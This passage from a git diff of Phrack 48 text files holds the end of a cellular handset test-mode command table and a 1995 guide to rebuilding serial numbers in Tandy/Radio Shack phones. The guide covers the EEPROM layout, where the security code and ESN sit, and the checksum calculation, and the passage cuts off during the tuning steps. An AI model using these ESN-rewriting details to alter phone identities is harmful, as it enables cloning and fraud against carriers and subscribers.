+|      |     0      | bit b5    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Extended field (bit b4) when enabled, the  |
+|      |     0      | mobile would scan more than 32 paging ch.  |
+|      |            | currently not used in UK.                  |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Single system scan (bit b3) if set to 1    |
+|      |      1     | the mobile will scan only 1 system based   |
+|      |            | on the setting of option byte A bit 6      |
+|      |            |  1 = enabled   0 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Auto recall (bit b2) this option allows the|
+|      |      1     | user to access repertory by a 1 or 2 digit |
+|      |            | send sequence                              |
+|      |            |  1 = enabled   0 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Disable service levels (bit b1) if set to 1|
+|      |      0     | service levels couldn't be changed from the|
+|      |            | control unit.                              |
+|      |            |  0 = enabled   1 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Lock code (bit b0) when enabled, allows the|
+|      |      0     | user to lock and unlock the mobile using   |
+|      |            | the three digit lock code.                 |
+|      |            |  0 = enabled   1 = disabled                |
+|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+| 10.  xxxxxxxx     - C option byte (in binary)
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | User NAM programming (bit c7) when enabled |
+|      |      0     | allows user to program NAM from handset    |
+|      |            |  0 = enabled   1 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | Single/Dual system (bit c6) 0=single 1=dual|
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Call timer (bit c5) when enabled, the user |
+|      |      0     | can access the call timer.                 |
+|      |            |  0 = enabled   1 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      1     | Auto re-dial (bit c4)                      |
+|      |            |  0 = enabled   1 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Speaker disable (bit c3) enable or disable |
+|      |      1     | handset speaker when fitting hands free    |
+|      |            |  0 = enabled   1 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit c2    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Selectable system (bit c1) allows user to  |
+|      |      1     | select primary system.                     |
+|      |            |  0 = enabled   1 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit c0    not used                         |
+|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+| 11.  xxxxxxxx     - D option byte (in binary)
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | Max volume (bit d7) sets max vol to step 4 |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | Theft disable (bit d6) when set to 1, theft|
+|      |            | alarm is not accessible.                   |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | Beeper disable (bit d5) 1=disable          |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      1     | EXT DTMF(bit d4) when clear, DTMF is routed|
+|      |            | directly through APC.                      |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | Flashing roam (bit d3) if enabled, roam    |
+|      |            | light will flash when home area roaming.   |
+|      |            |  1 = enabled   0 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Audio convenience (bit d2) if disabled,    |
+|      |      0     | audio levels are re-centered on power up.  |
+|      |            |  0 = enabled   1 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Time rx calls (bit d1) call timers will    |
+|      |      0     | accumulate on incoming calls when enabled  |
+|      |            |  1 = enabled   0 = disabled                |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |            | Charge rate (bit d0) when enabled,telephone|
+|      |      1     | will respond to charge rate information    |
+|      |            |  1 = enabled   0 = disabled                |
+|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+| 12.  0023         - Initial paging system 0023=Vodaphone 0323=Cellnet   
+| 13.  0023         - Initial paging channel A 
+| 14.  0323         - Initial paging channel B
+| 15.  021          - Dedicated paging channels
+| 16.  xxxxxxxx     - E option bytes (in binary)
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit e7    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit e6    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit e5    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit e4    transportable speaker present    |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit e3    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit e2    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      0     | bit e1    not used                         |
+|      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+|      |      1     | Word sync scan disable (bit e0) portable   |
+|      |            | use only.                                  |
+|      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+|-------------|---------------------|---------|-----------------------------
+|      56#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      57#    |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      58#    | COMPANDER ON        |         | Turn compander ON
+|-------------|---------------------|---------|-----------------------------
+|      59#    | COMPANDER OFF       |         | Turn compander OFF
+|-------------|---------------------|---------|-----------------------------
+| 60# and 61# |  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      61#    | ESN TRANSFER        |         | For series I or 1? and MINI
+|             |                     |         | TACS - Probably Micro TACS.
+|-------------|---------------------|---------|-----------------------------
+|      62#    | RNG-ON              |         | Turn the APC ringer audio
+|             |                     |         | path ON.
+|-------------|---------------------|---------|-----------------------------
+|      63#    | RNG-OFF             |         | Turn the APC ringer audio
+|             |                     |         | path OFF.
+|-------------|---------------------|---------|-----------------------------
+|      64#    | PLT-ON              |         | Turn the APC transmit pilot
+|             |                     |         | path on.
+|-------------|---------------------|---------|-----------------------------
+|      65#    | PLT-OFF             |         | Turn the APC transmit pilot
+|             |                     |         | path off.
+|-------------|---------------------|---------|-----------------------------
+| 66# thru 71#|  (NOT USED)         |         |
+|-------------|---------------------|---------|-----------------------------
+|      66#    | IDENTITY TRANSFER   |         | Series II and some current
+|             |                     |         | portables.
+|-------------|---------------------|---------|-----------------------------
+|      68#    | DISPLAY FLEX AND    |         |
+|             | MODEL INFO          |         |
+|-------------|---------------------|---------|-----------------------------
+|      69#    | USED WITH IDENTITY  |         |
+|             | TRANSFER            |         |
+|-------------|---------------------|---------|-----------------------------
+|      72#    | MODULATION GAIN     |         | Refer to the Portable 
+|             | ADJUST              |         | Telephone Phasing section for
+|             |                     |         | use of this command.
+|-------------|---------------------|---------|-----------------------------
+|      73#    | POWER OUTPUT ADJUST |         | Refer to the Portable
+|             |                     |         | Telephone Phasing section for
+|             |                     |         | use of this command.
+|             |                     |         | (0 to 7.)
+|-------------|---------------------|---------|-----------------------------
+
+
diff --git a/phrack48/7.txt b/phrack48/7.txt
new file mode 100644
index 0000000..51cb5ce
--- /dev/null
+++ b/phrack48/7.txt
@@ -0,0 +1,1045 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 7 of 18
+
+
+                   TANDY / RADIO SHACK CELLULAR PHONES
+
+           REBUILDING ELECTRONIC SERIAL NUMBERS AND OTHER DATA
+
+
+                             By Damien Thorn
+
+
+
+
+                                LEGAL CRAP
+
+(mandated by our cheap-suit, can't afford cigars, polyester-pants-wearing,
+no-practice-having, almost dis-barred, old-fart legal counsel who only charges
+us $20 / hour because he meant to retire when he was 70 but lived a few years
+longer than he expected...hell, we love him!)
+
+Contents copyright 1994, 1995  Phoenix Rising Communications.
+Software copyright 1993, 1994, 1995 as indicated.
+
+All Rights Reserved.  Distribution of contents in hard-copy form is forbidden.
+Redistribution in electronic form is permitted only as outlined in the Phrack
+licensing agreement, provided this article is not segregated from the other
+editorial contents of Phrack #48.
+
+Use caution when rebuilding corrupt serial numbers, and avoid lending your
+talents to further the goals of unscrupulous people.
+
+Altering the serial number of a cellular transceiver is a violation of the
+FCC rules, and the U.S. Secret Service is charged with the responsibility
+of investigating fraudulent activity.
+
+All of this material was developed in-house and not provided or
+endorsed by the manufacturer.  Brand names and trademarks are used for
+identification purposes only and are the property of their respective
+owners.  Use of same within this article definitely does not imply agreement
+with or endorsement of the material presented, and probably aggravates them
+to no end.   There are no guarantees or warranties with regard to the accuracy
+of this article.  Although we've done the best job that we can, we may be
+wrong.  Happens all the time.  If you damage a phone or inadvertently start
+a global thermonuclear war, that's your problem.  Don't come crying to us, or
+make us fork over another twenty bucks to the old shyster. What you do with
+this information is your responsibility.
+
+
+                               INTRODUCTION
+
+                                     
+While manufacturers publish service manuals for their cellular
+transceivers, they have an annoying habit of omitting certain
+data pertaining to memory devices and the arrangement of the data
+stored inside them.  Since this stored information includes the
+electronic serial number (ESN), the lack of documentation can
+easily be excused as a way to avoid unwittingly facilitating
+fraud.
+
+The drawback to the 'security through obscurity' approach is that
+service technicians who have a legitimate need to reprogram these
+memory devices are unable to do so.  The Nokia-designed
+transceivers discussed in this article are an excellent example. 
+Since the ESN is stored in the same electrically-erasable
+programmable read-only memory (EEPROM) device as the numeric
+assignment module (NAM) information, corruption of the data can
+be catastrophic to the operation of the phone.
+
+Since the handset programming mode of these Nokia units actually
+write-enables the memory device to store the alterable parameters,
+an errant pulse from the microprocessor, dropped bits or supply
+voltages falling out of tolerance can cause the ESN or checksum
+to become overwritten or otherwise rendered useless.  Should this
+occur, dealers have had little recourse but to ship the
+transceiver back to the factory for repair.  Until now, that is.
+
+The goal of Phoenix Rising Communications in producing this
+documentation is to empower technicians to do the job they have
+been educated and hired to perform.  This guide to Tandy and
+Radio Shack cellular phones will enable the technician to rebuild the
+corrupt data within this series of transceivers with confidence.
+
+The information in this article was developed from the installed
+and transportable versions of the most commonly purchased phones
+from Radio Shack stores.  These units were sold for many years,
+and finally replaced last year with a new, redesigned model.  The
+data presented here can probably be applied to certain compatible
+Nokia transceivers as indicated later in the text. 
+
+
+                                 CHAPTER 1
+
+This publication is designed to provide supplemental information
+to assist in the servicing of cellular mobile telephones
+manufactured by Tandy Corporation under license from the Nokia Corporation. 
+It is not meant to be a replacement for the factory service manual. 
+Any shop needing to perform component level repairs should
+definitely obtain the factory documentation from Tandy National
+Parts.
+
+Our primary goal is to explain the contents of the numeric
+assignment module, or NAM.  In these particular phones, both the
+NAM parameters and the electronic serial number (ESN) are stored
+within the same electrically erasable programmable read-only
+memory (EEPROM) device.
+
+The problem inherent with this engineering decision is that the
+ESN stored within this chip is not necessarily permanent.  Since the
+chip can be erased or reprogrammed, certain circumstances could
+possibly cause the ESN to become corrupt.  These include improper
+signals from the microprocessor, induced currents or a power
+interruption during NAM programming as the write cycle is taking
+place.
+
+Since the available service literature does not describe the
+functions of this serial EEPROM or the data contained within,
+service personnel would have to return the transceiver to the
+manufacturer for service.  This is not cost effective in terms of
+time or money for either the shop or cellular customer.
+
+Technicians who invest a little time to become familiar with the
+data stored within the NAM circuitry, including the placement of
+the ESN and checksum byte can service these types of problems
+in-house and with little difficulty.
+
+Basic instructions for peaking the transceiver's RF sections have
+also been included herein as a convenience.  While the phone is
+open and on the test bench, the customer's transceiver should
+also be given a quick check for proper alignment.
+
+                            EQUIPMENT REQUIRED
+
+Other than basic hand tools, disassembly of the phone requires a
+soldering iron with a medium sized tip and a vacuum de-soldering
+tool.  Good size solder removal braid may be used in conjunction
+with, or in lieu of the de-soldering tool.
+
+To correct data that has become corrupted within the EEPROM, a
+programming device is required capable of reading and burning an
+8-pin DIP integrated circuit.  One such inexpensive device is
+listed in appendix III.
+
+An individual who is familiar with the memory device involved has
+written a software program in the BASIC language to allow the
+programming of this chip via the parallel port of an
+IBM-compatible personal computer.  The source code for this program
+can be found in the appendix, and is provided as a reference only.  Such
+software is subject to the peculiarities of the host PC and
+therefore cannot be recommended for use in place of a standard PROM
+programmer.  Older versions of GWBASIC are preferred to Microsoft's
+current QBASIC interpreter.
+
+                              MODELS COVERED
+
+The information presented is believed to cover all of the installed
+and transportable (bag phone) cellular transceivers manufactured
+by the Tandy Corporation under license from the Nokia Corporation up
+until about a year ago.
+ 
+Tests have been conducted on a random selection of these phones
+with manufacture dates ranging from 1989 through early 1994.  All
+versions of the "TP" firmware through January, 1994 should be
+supported.
+
+Although no house-branded OEM Nokia transceivers have been
+tested, we have surmised that this information is applicable to several
+models based on the same or a similar design.  These models
+include the Nokia LX-11, M-11, M-10 and the Nokia-Mobira P4000 (PT612). 
+Some of these units, like the very old Radio Shack equivalents,
+will require a service handset to program.  More on that in the
+next issue of Phrack.
+
+                              HAND-HELD UNITS
+
+Only one of the hand-held cellular phones previously sold through
+Radio Shack utilizes a discrete surface-mounted integrated
+circuit to store the ESN and NAM parameters.  If you have the capability
+to read and program this SOIC 93C46 memory device you may be able to
+extrapolate the PROM dumps in this guide to work with this phone.
+
+Due to the difficulty in disassembling this unit and the delicate
+nature of the surface-mounted EEPROM, the reader is cautioned
+against attempting to service these in-house.
+
+                                DISASSEMBLY
+
+Prior to disassembling the transceiver, all antenna and cables,
+including the handset, should be disconnected from the jacks on
+the unit.
+
+To aid in disassembly and component location, the original
+hard-copy version of this publication contained several pages of
+photographs.  While the hard-copy version is available (see end of
+article), you will hopefully be able to figure out what we're talking about
+without them.
+
+Disassembly begins by snapping the plastic end panel from the
+black transceiver cover.  Some units just pop up and off, while others
+have two small plastic tabs on each side that must be depressed
+free the end panel for removal.
+
+With the end panel removed, the top plastic cover is now free to
+slide off.  With this cover removed, the metal transceiver itself
+can be dumped from the remaining plastic housing by turning it
+upside down, or pulling up on the metal heat sink assembly that
+comprises one side of the transceiver unit.
+
+There is a metal shield on each side of the transceiver (top and
+bottom.)  One is a solid piece of thin sheet metal, and the other
+is broken up in to smaller, individual shields and soldered to
+the transceiver chassis.  The shield that needs to be removed is the
+solid one.  It is only held in place with the friction grips
+along the edges, and can be pried off with your fingers.
+
+Once the shield is removed from the proper side of the
+transceiver, the solder side of the logic board will be exposed.
+This board must be removed to gain access to the component side.  Take
+static precautions so as not to fry the CMOS silicon that is currently
+hidden from view. 
+
+Other than several connectors that mate between the two boards,
+the board is usually held in place by several blobs of solder spaced
+along the edge of the board.  These small 'solder welds' serve as
+a ground bond between the board and the transceiver chassis, and
+are not electrically necessary under normal circumstances.
+
+Once the solder ground bonds have been melted and removed with a
+de-soldering tool or solder wick, use a pair of needle-nose pliers
+to gently bend back the small metal tabs holding the circuit
+board in place.
+
+Before proceeding, inspect the foil side of the board to ensure
+that no solder has splashed on the board during de-soldering, and
+that the foil traces where the work was performed are still
+intact.  This last step is where most trouble arises.  These boards are
+delicate, and a heavy hand while prying or bending will almost
+ensure that a trace or five will be transected when the tool
+slips.  If this happens, resolder the traces to undo the damage.
+
+At this point the logic board is held in place only by pins on
+the transceiver board sticking up in to sockets on the logic board. 
+Gripping the edges of the logic board with your fingers and
+pulling straight up will disengage the connectors and allow the logic
+board to pull free of the transceiver.  Slightly rocking the board from
+each side may aid in the removal.  Do not grip the board with
+pliers or damage can result to the small chip resistors and other
+components mounted on the solder side of the board.
+
+Once dislodged, you'll have two separate circuit boards.   
+
+                              THE LOGIC BOARD
+
+The board that supplies logic and control functions for the
+cellular mobile telephone is easily identifiable by the
+microprocessor and 27C512 EPROM containing the operating
+firmware.  The EPROM's erase window is covered by a protective sticker
+that identifies the firmware version stored therein.  Within the last
+few years, the version has ranged from TP-2 through TP-8.
+
+Also on this board is the serial EEPROM where the ESN and NAM
+parameters are stored.  This chip is an 8-pin DIP located in a
+socket near pin #1 of the NEC microprocessor.  It is usually
+covered with a small paper sticker bearing the last few digits of
+the serial number stored inside.
+
+While security experts may blast Nokia for designing a phone that
+stores the ESN in a socketed chip, and then says "here I am" by
+placing a sticker on it, this is a dream come true for any
+technician facing issues of data corruption.  
+
+                             THE SERIAL EEPROM
+
+The Serial EEPROM containing all of this data is a PCD8572 (or
+85C72) manufactured by Microchip Technology, Inc.
+
+This 8-pin device is a 1k (128x8) CMOS serial electrically
+erasable PROM.  The pin configuration for the device can be found in the
+appendix.
+
+Power is supplied to this chip only when the microprocessor is
+performing a read or write operation.  Transistor Q115 (surface
+mounted to the underside of the logic board right about in the
+middle) switches the supply voltage on and off.  Should power be
+interrupted during the write cycle, the ESN may become corrupt.
+
+                            REBUILDING THE ESN
+
+To replace the damaged serial number, note the unit's serial
+number from the cellular service agreement or the phone itself.
+The ESN (in decimal) is located on a white paper sticker applied to the
+side of the metal transceiver chassis.  It is also stamped into the
+plastic model identification plate on one side of the plastic
+outer housing.
+
+For reprogramming, the ESN must be converted to hex.  A scientific
+calculator or any number of public domain computer programs will
+simplify the task.
+
+                          CONTENTS OF NAM
+
+Once the original serial number has been determined, carefully
+remove the 8572 EEPROM from the socket and place it in the
+adapter required by your PROM programmer.  Reading the contents of the
+chip, you'll see data as depicted below.
+
+Note that these data dumps are simulated for illustrative purposes.
+The ESN and encoded MIN bytes are not legitimate numbers, so don't
+bother 'testing' them.
+
+The first five bytes of data contain the security code.  These
+bytes are the hex values representing ASCII characters 0 through
+9, thus represented as "3X" where "X" is the actual digit of the
+security code.  A factory security code of 1 2 3 4 5 would be
+represented in bytes 00 through 04 as follows:
+
+31 32 33 34 35
+
+Since you will require the security code to enter handset
+programming mode, please note the current security code or
+program these bytes with your shop's standard default.
+ 
+                     UNDERSTANDING ADDRESSES
+
+Some cellular technicians have little experience in the digital
+world.  Service monitors and watt-meters are expensive and wonderful
+devices, but sometimes you need to do a little more than tweak a pot
+to fix a phone.  The digital-literate can skip this oversimplified
+explanation.
+
+To assist those in reading the locations of the various bytes in the EEPROM,
+understand that each line (as usually displayed on a programmer) contains
+sixteen (16) bytes.  The first line begins with byte 00, then 01, 02, 03,
+04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E and finally 0F.
+
+The second line begins with 10, then 11, 12, 13, 14, 15, 16, 17,
+18, 19, 1A, 1B, 1C, 1D, 1E, and 1F as the last byte of the line. 
+The third line increments the same way, except as byte 30, 31,
+etc., to 3F.  You now know how to count in base 16 (hex)! 
+
+As an example, the locations used by the phone end at byte 3D,
+which contains 00 in the example below.  Beginning with the next
+byte (3E), a repetitive pattern of alternating values of AA and
+55 are stored.  This is just 'test' data and is never read by the
+phone.  The chip itself ends at byte 7F, and your PROM programmer
+may display FF following byte 7F to indicate the non-existence of
+these locations in the chip.
+
+   
+                     8572 EXAMPLE DATA DUMP
+
+
+          0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
+          0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
+          0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
+          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF 00 AA 55
+          0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
+
+
+                    THE CRUCIAL SERIAL NUMBER
+
+The hex ESN for any given phone consists of four bytes, as we use
+the term here.  Technically it is eight bytes (in hex, 32 bits if
+expressed in binary form), but we're referring to a 'byte' as a two-digit
+hex number, rather than each digit (byte) as a single entity.  For our
+example, we're using the fictitious ESN of A521FF0A.  All Radio Shack
+phones will have an ESN beginning with A5 hex.  This is the "manufacturers
+code" prefix that has been assigned to Tandy.
+
+Breaking the ESN into four bytes as viewed on the PROM programmer,
+the ESN would appear as:
+
+                          A5 21 FF 0A
+
+Refer back to the example dump of the data within the 8572 IC. 
+Immediately following the security code is the ESN stored in
+reverse order.  With the security code occupying bytes 00 to 04,
+the ESN is located in bytes 05, 06, 07 and 08.  Byte 09 contains
+the value 38.  It should always contain 38.
+
+In the example, beginning with byte 05 you can read the ESN (in
+reverse sequence) as:
+
+                         0A FF 21 A5
+
+The examples below will assist you in visualizing the bytes
+containing the security code and the electronic serial number. 
+The programming and placement of these two crucial pieces of data is
+fairly straight forward.  Using the buffer editor function of the
+PROM programmer, you can simply type over the garbage that may be
+present in these locations with the correct values for the
+security code and the ESN.  Double check your data entry!
+
+                      OTHER ADDRESSES
+
+The entire NAM data is stored in the remaining locations of this
+chip.  Bytes 0A, 0B and 0C contain the firmware revision date,
+and bytes 0D - 0F contain the installation date as programmed via the
+handset programming mode.
+
+Other bytes contain the encoded Mobile Identification Number
+(MIN), Station Class Mark (SCM), etc.
+
+These various bytes do not need to be reprogrammed through your
+PROM burner, as they can all be corrected via handset
+programming.  Only the security code and ESN must be properly reprogrammed
+directly to the chip itself.  For more information on the locations
+of this other data, refer to the source code in Appendix A.  It
+allows you to see where (and how) this other data is stored within
+the NAM.
+
+The last item to program is the checksum.
+
+
+THE SECURITY CODE:  BYTES 00 - 04
+
+          0000 31 32 33 34 35 XX XX XX XX XX XX XX XX XX XX XX
+
+     
+THE ESN:  BYTES 05 - 08
+
+          0000 XX XX XX XX XX 0A FF 21 A5 XX XX XX XX XX XX XX
+
+
+                    LOCATING THE CHECKSUM
+
+There is a one byte device checksum stored within the 8572 that
+is used by the phone to check the integrity of the data stored
+therein.  The checksum is located at byte 3D, indicated by "XX"
+in the example below.
+
+The checksum is derived from all the data stored in the NAM, not
+just the ESN.  Computing it is relatively easy as it is simply
+the sum (in hex) of all the values from bytes 00 through 3C as
+underlined below.
+
+Assuming the PROM programmer has a checksum function, you can
+enter the beginning address as 0000 and the ending address as 003C. 
+The software will add all of the values between these locations and
+give you the sum.  The alternative is to add the numbers manually
+using the hex mode of a scientific calculator.  Either way, adding
+the hex values of all the bytes between 00 and 3C of our example yields
+a sum of 0B5E.
+
+The least significant two-digit byte is the actual device
+checksum that would be programmed in location 3D.  In our example, the
+least significant half is 5E.  Ignoring the most significant half of
+the sum (0B), a value of 5E must be programmed to location 3D.
+
+Note that the checksum will be recomputed and change after
+handset programming.  When the MIN or other data is changed, it alters
+the values in various bytes.  The checksum encompasses all of the
+data stored within the chip used by the transceiver's firmware.
+
+                          CHECKSUM LOCATION
+
+          0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
+          0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
+          0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
+          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55
+          0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
+
+
+                   BYTES SUMMED TO DERIVE CHECKSUM
+
+          0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
+          0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
+          0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
+          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF .. .. ..
+          0040 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
+          0050 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
+          0060 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
+          0070 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. 
+
+                            DEFAULT VALUES
+
+In the event that all of the data stored within the NAM becomes
+corrupt, the technician will need to program the security code,
+the ESN, and certain default data values to allow the phone to power
+up.  Once powered up, all of the other data can be automatically
+reconstructed by the phone using the handset programming mode.
+
+Since the factory does not provide any information about the
+contents of the 8572 EEPROM, we are unsure of the function of
+this 'default data.'  It seems to have little significance.
+
+The underlined bytes depicted below are fairly typical.  Ideally
+the technician should compare the contents of an operational
+phone with equivalent firmware to determine the values for the
+underlined locations, but if this is not possible then the values
+provided in the example may suffice.
+
+Once these defaults have been programmed in the proper locations,
+and the ESN and security code have been reconstructed, compute
+the checksum and store it in address 3D. Temporarily reassemble the
+phone and apply power.  The unit should power up and complete it's
+self-test which will include the operation where the microprocessor
+computes the NAM checksum and compares it to the value stored in
+location 3D.
+
+Assuming the self-diagnostics pass, the remaining data can now be
+reconstructed through normal handset programming.
+
+The handset programming template applicable to most of these
+units is located immediately following the appendix detailing the chip
+programming software included for reference purposes.  
+
+
+                        DEFAULT DATA VALUES
+
+          0000 XX XX XX XX XX XX XX XX XX 38 XX XX XX XX XX XX
+          0010 00 00 00 00 XX XX XX XX XX XX XX XX XX XX XX XX
+          0020 XX XX XX XX XX XX XX 00 27 00 01 01 11 11 11 11
+          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55
+          0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
+          0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
+
+                         ADDITIONAL NOTES
+
+As discussed, the parallel port programming software interface
+has a few quirks, most involving the programming voltage supplied to
+the chip.  If all else fails, and a PROM burner is not available,
+take the supply voltage (Vcc) directly from the logic board.
+
+Run test lead jumpers from pins #4 and #8 of the IC socket on the
+logic board that held the 8572 EEPROM and connect to the
+respective pins on the socket attached to the cable to be used for
+programming.  Turn the board over and locate surface mount
+transistor Q115 which switches the supply voltage to the IC
+socket on and off.
+
+This small chip transistor is directly to the left of pin #8 (of
+the 8572 socket) and can be positively identified by the circuit
+trace from socket pin #8 leading directly to the emitter of Q115.
+
+By examining this area of the board, you can determine which of
+the other two traces connects to the transistor's collector. 
+Jumpering the traces and shorting the collector and emitter simply
+provides a constant, conditioned voltage supply to the socket designed to
+power the 8572 in programming mode.  It may also be necessary to cut the
+trace to the base of Q115.
+
+Once the chip has been programmed with the software, restore the
+integrity of the cut trace to the base of Q115 and remove the
+short between the collector and emitter.
+
+                         USING THE SOFTWARE
+
+The Cellular Data Repair Utility software requires that you first
+create a small text file using an ASCII text editor such as DOS's
+"EDIT" utility program.
+
+This text file must contain the data described below in the
+specific order presented.  The data in this image (.img) file
+will be programmed into the 8572.
+
+XXX       ESN Prefix (decimal)
+XXXXXXXX  ESN (8 digits decimal)
+XXXXX     SIDH (5 digits decimal)
+1         Access Bit
+1         Local Option Bit
+AAAPPPXXXX       MIN (10 digits)
+08        SCM
+0XXX      (0333 or 0334)
+10        Access Overload Class
+1         Pref. System Bit
+10        GIM
+12345     Security Code
+
+
+EXAMPLE IMAGE FILE
+Filename:  TEST.IMG
+
+165
+00246812
+00031
+1
+1
+5105551212
+08
+0334
+10
+1
+10
+12345
+
+
+                              PROGRAMMING
+
+Once the image file containing the appropriate data has been
+saved, run the software with QBASIC or Microsoft BASIC and follow the
+prompts.  Be sure to set the proper parallel port address in line
+1950 to reflect the port to which the interface is connected
+first.
+
+                             TUNING STEPS
+
+1)   With a digital voltmeter attached to the positive terminal
